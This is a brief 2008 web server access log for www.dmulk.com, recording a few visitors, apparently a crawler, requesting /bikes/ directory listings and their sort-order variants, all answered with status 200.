194.72.9.25 - - [16/Jan/2008:15:28:01 -0800] "GET /bikes/CreSTOC07/?N=A HTTP/1.1" 200 15296 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:28:02 -0800] "GET /bikes/GPS/?N=D HTTP/1.1" 200 677 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:28:04 -0800] "GET /bikes/?M=A HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:05 -0800] "GET /bikes/dteel/ HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:28:05 -0800] "GET /bikes/?D=A HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:06 -0800] "GET /bikes/dteel/?M=A HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:07 -0800] "GET /bikes/dteel/?D=A HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:28:07 -0800] "GET /bikes/dteel/?A HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:28:08 -0800] "GET /bikes/dteel/?M=D HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:08 -0800] "GET /bikes/dteel/?D=D HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:28:09 -0800] "GET /bikes/dteel/10MAR07/ HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:12 -0800] "GET /bikes/dteel/EQ2/ HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:28:12 -0800] "GET /bikes/dteel/10MAR07/?N=A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:28:12 -0800] "GET /bikes/dteel/10MAR07/?M=A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:28:13 -0800] "GET /bikes/dteel/EQ2/?N=D HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:28:13 -0800] "GET /bikes/dteel/EQ2/?A HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:28:16 -0800] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:16 -0800] "GET /bikes/dteel/EQ2/?N=A HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:17 -0800] "GET /bikes/dteel/10MAR07/?M=D HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:28:17 -0800] "GET /bikes/dteel/EQ2/Screenshots/?M=A HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:18 -0800] "GET /bikes/dteel/EQ2/Screenshots/?D=A HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:28:20 -0800] "GET /bikes/dteel/?N=A HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:28:22 -0800] "GET /bikes/dteel/EQ2/Screenshots/?M=D HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.26 - - [16/Jan/2008:15:28:22 -0800] "GET /bikes/dteel/EQ2/Screenshots/?D=D HTTP/1.1" 200 7116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:28:24 -0800] "GET /bikes/dteel/?N=D HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:28:24 -0800] "GET /bikes/dteel/10MAR07/?D=A HTTP/1.1" 200 849 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:28:26 -0800] "GET /bikes/?M=D HTTP/1.1" 200 2184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
